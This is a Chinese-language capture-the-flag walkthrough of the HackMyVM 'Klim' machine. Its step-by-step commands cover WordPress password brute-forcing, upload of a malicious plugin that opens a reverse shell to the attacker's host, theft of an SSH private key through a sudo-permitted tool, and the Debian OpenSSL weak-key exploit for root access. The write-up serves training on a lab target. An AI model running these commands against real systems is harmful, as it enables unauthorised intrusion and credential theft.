靶机信息
下载地址:
https://hackmyvm.eu/machines/machine.php?vm=Klim
网盘链接:https://pan.baidu.com/s/1OjMwuU6F1V98x2UnLz-eHA?pwd=xcvx
靶场: HackMyVm.eu
靶机名称: Klim
难度: 中等
发布时间: 2021年7月27日
提示信息:
无
目标: user.txt和root.txt
实验环境
攻击机:VMware kali 10.0.0.3 eth0桥接互联网,eth1桥接vbox-Host-Only
靶机:Vbox linux IP自动获取 网卡host-Only
信息收集
扫描主机
扫描局域网内的靶机IP地址
sudo arp-scan -I eth1 10.0.0.0/24
扫描到主机地址为10.0.0.144
扫描端口
扫描靶机开放的服务端口
sudo nmap -sC -sV -p- 10.0.0.144 -oN nmap.log
扫描到开放22和80端口,先来看看80端口
Web渗透
访问后是Apache的默认页面,来做个目录扫描
dirsearch -u http://10.0.0.144
发现wordpress应用程序,访问看看
http://10.0.0.144/wordpress/
访问后确认是wordpress,使用wpscan扫描漏洞
wpscan --url http://10.0.0.144/wordpress --api-token 你的api -e
未发现可利用漏洞,发现klim用户。暴破这个账号
wpscan --url http://10.0.0.144/wordpress --api-token 你的API -P /usr/share/wordlists/rockyou.txt -U klim
利用暴破密码时间对wordpress目录做目录扫描
dirsearch -u http://10.0.0.144/wordpress
扫描到上传目录,来访问下
http://10.0.0.144/wordpress/wp-content/uploads/
两个目录,看看有没有敏感信息
发现一张图片,下载下来检查下
wget http://10.0.0.144/wordpress/wp-content/uploads/2021/07/image.jpg
file image.jpg
stegseek image.jpg
下载后使用file检查是正常的图片文件,更换StegSeek检查后得到一个密码及image.jpg.out文件。来看一下image.jpg.out内容
打开后发现是HTTP的数据包,并且得到一个密码,现在拿到两个密码了,尝试登录后台
使用HTTP数据包中的密码登录成功(注意URL编码),尝试修改模板拿到一个shell
打开模板修改页面后发现这个版本不能直接修改模板,那我们可以上传个恶意插件来拿到shell
工具下载地址:
https://github.com/wetw0rk/malicious-wordpress-plugin
1。生成恶意插件
python3 wordpwn.py 10.0.0.3 4444 Y
执行后会自动生成malicious.zip,并帮你打开msf监听4444端口
现在我们来上传恶意插件
执行shell
curl http://10.0.0.144/wordpress/wp-content/plugins/malicious/wetw0rk_maybe.php
反弹成功,来查找敏感信息
cd ../../../
cat wp-config.php
找到数据库账号密码,继续找
发现普通用户klim,继续找
sudo -l
发现可以使用klim用户身份执行/home/klim/tool文件,来看下这个文件是做什么的
ls -al /home/klim/tool
strings /home/klim/tool
发现程序执行了cat命令,那我们尝试读取id_rsa文件
sudo -u klim /home/klim/tool /home/klim/.ssh/id_rsa
读取成功,保存下来尝试登录 SSH
vi id_rsa
chmod 600 id_rsa
ssh [email protected] -i id_rsa
登录成功,先来看看flag
ls -al
cat user.txt
拿到user.txt,查找敏感信息
cd /opt
ls -al
cat id_rsa.pub
在/opt目录下找到root的公钥,公钥对我们来说没什么用处,但是生成他的openssl有能会存在漏洞,先来看一下openssl版本
openssl version
这是个老版本漏洞叫心脏滴血,来找一下exp
这三个应该都可以用,挑一个最新的看下内容
执行这个EXP需要3部,来验证一下
1。攻击机下载5622.tar.bz2并解压
mkdir keys
cd keys
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
tar -zxvf 5622.tar.bz2
2。下载exp脚本
wget https://www.exploit-db.com/download/5720
mv 5720 exp.py
3。执行exp
python2 exp.py keys/rsa/2048/ 10.0.0.144 root 22 5
成功拿到key文件,登录验证
登录成功,拿到root.txt,游戏结束。
原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.79 Klim
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论